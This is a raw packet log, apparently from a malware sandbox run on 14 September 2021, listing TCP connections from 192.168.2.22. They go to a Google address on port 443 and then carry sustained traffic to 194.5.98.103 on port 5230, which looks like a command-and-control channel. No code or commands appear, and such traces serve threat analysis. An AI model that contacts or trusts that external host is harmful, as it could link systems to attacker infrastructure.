                                  Sep 14, 2021 21:48:20.676224947 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:20.676276922 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:20.676404953 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:20.693830967 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:20.693886042 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:20.768734932 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:20.768897057 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:20.785007954 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:20.785058975 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:20.785413027 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.001353025 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.001543999 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.201751947 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.243160009 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.645766020 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.645834923 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.645879984 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.645927906 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.646014929 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.646092892 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.646133900 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.646162033 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.646585941 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.647260904 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.648772001 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.648819923 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.648950100 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.648983955 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.650319099 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.650574923 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.650650024 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.652144909 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.652246952 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.652278900 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.670445919 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.670625925 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.670676947 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.671161890 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.671330929 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.671350956 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.875433922 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.875466108 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.903179884 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.903304100 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.903337002 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.904831886 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.904892921 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.904994011 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.905016899 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.905092955 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.906409025 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.907944918 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.908031940 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.908107996 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.908139944 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.908221006 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.909463882 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.911001921 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.911078930 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.911153078 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.911183119 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.911294937 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.912583113 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.914163113 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.914243937 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.914264917 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.914284945 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.914376020 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.915771961 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.917263985 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.917349100 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.917347908 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.917375088 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:21.917442083 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:21.917452097 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:22.116101027 CEST44349166172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:22.116261959 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:22.385004997 CEST49166443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:33.473968029 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:33.474039078 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:33.474144936 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:33.504641056 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:33.504712105 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:33.571932077 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:33.572020054 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:33.579902887 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:33.579921961 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:33.580670118 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:33.779315948 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:33.923206091 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:33.967129946 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.361788988 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.361865997 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.361917973 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.361973047 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.362020016 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.362066984 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.362101078 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.362143040 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.362293959 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.363080025 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.364854097 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.364913940 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.364983082 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.365011930 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.365086079 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.366472006 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.368295908 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.368398905 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.368427992 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.368454933 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.370279074 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.386620045 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.387269974 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.387366056 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.387377977 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.387413025 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.387495041 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.387510061 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.603131056 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.603231907 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.619673967 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.619781017 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.619857073 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.619868994 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.622193098 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.622311115 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.622320890 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.623399973 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.624222994 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.624285936 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.624367952 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.624377966 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.624607086 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.624681950 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.624689102 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.625479937 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.625750065 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.625799894 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.625811100 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.626739979 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.626797915 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.626858950 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.626868010 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.627110004 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.627628088 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.627679110 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.627680063 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.627691984 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.627729893 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:34.628726959 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.827591896 CEST44349168172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:34.827682018 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:39.808412075 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:39.808465004 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:39.808545113 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:39.823080063 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:39.823111057 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:39.899425983 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:39.899511099 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:39.908207893 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:39.908231974 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:39.908987045 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.113446951 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:40.337970018 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:40.379129887 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.779282093 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.779372931 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.779432058 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.779479980 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.779519081 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.780915976 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:40.780939102 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.780989885 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.782561064 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:40.782587051 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.783030033 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.785029888 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.785094976 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.785303116 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:40.785319090 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.787098885 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.787255049 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:40.787276030 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.809161901 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.809231997 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.809252977 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:40.809279919 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:40.809340000 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:40.809350967 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.018443108 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.033230066 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.033538103 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.033657074 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.033673048 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.035295010 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.035377026 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.035398006 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.039618969 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.039767981 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.039788961 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.039912939 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.040067911 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.040081978 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.041516066 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.041582108 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.041596889 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.043056965 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.043128967 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.043145895 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.044631958 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.044739962 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.044759035 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.046489000 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.046633005 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.046641111 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.047851086 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.047940016 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.047957897 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.048753023 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.048902988 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:41.048923016 CEST44349170172.217.168.36192.168.2.22
                                  Sep 14, 2021 21:48:41.206552029 CEST49170443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:45.104109049 CEST49168443192.168.2.22172.217.168.36
                                  Sep 14, 2021 21:48:50.276488066 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:50.431694984 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:50.431898117 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:50.478485107 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:50.649172068 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:50.649323940 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:50.844927073 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:50.845810890 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.001532078 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.001604080 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.213165045 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.213275909 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.421833992 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.423844099 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.428248882 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.428339958 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.428421021 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.428477049 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.428514004 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.431859970 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.584537029 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.584628105 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.584645987 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.584667921 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.584733963 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.584757090 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.586348057 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.586430073 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.586515903 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.586600065 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.586672068 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.586745977 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.739583969 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.739666939 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.739721060 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.739835978 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.739917040 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.739917994 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.740098953 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.740156889 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.740214109 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.740756989 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.740853071 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.740880013 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.741166115 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.741233110 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.741276026 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.741300106 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.741353035 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.741449118 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.741565943 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.741631031 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.741638899 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.894809008 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.894870996 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.894905090 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.895024061 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.895065069 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.895283937 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.895811081 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.895987034 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.896027088 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.896126032 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.896169901 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.896258116 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.896503925 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.896553040 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.896614075 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.896723986 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.896763086 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.896899939 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.897001028 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.897058964 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.897188902 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.897344112 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.897388935 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.897468090 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.897624969 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.897675037 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.897753954 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.897898912 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.897939920 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.898066998 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.898180962 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.898231030 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.898463011 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.898530006 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.898585081 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.898694992 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.898710966 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.898760080 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.899025917 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.899156094 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.899172068 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.899205923 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:51.899367094 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:51.899416924 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:52.049984932 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.050004959 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.050026894 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.050064087 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:52.050266981 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.050321102 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:52.050529003 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.050669909 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.050689936 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.050712109 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:52.051121950 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.051166058 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:52.051235914 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.051429033 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.051454067 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.051485062 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:52.051511049 CEST523049172194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:48:52.051553011 CEST491725230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:48:52.051901102 CEST523049172194.5.98.103192.168.2.22
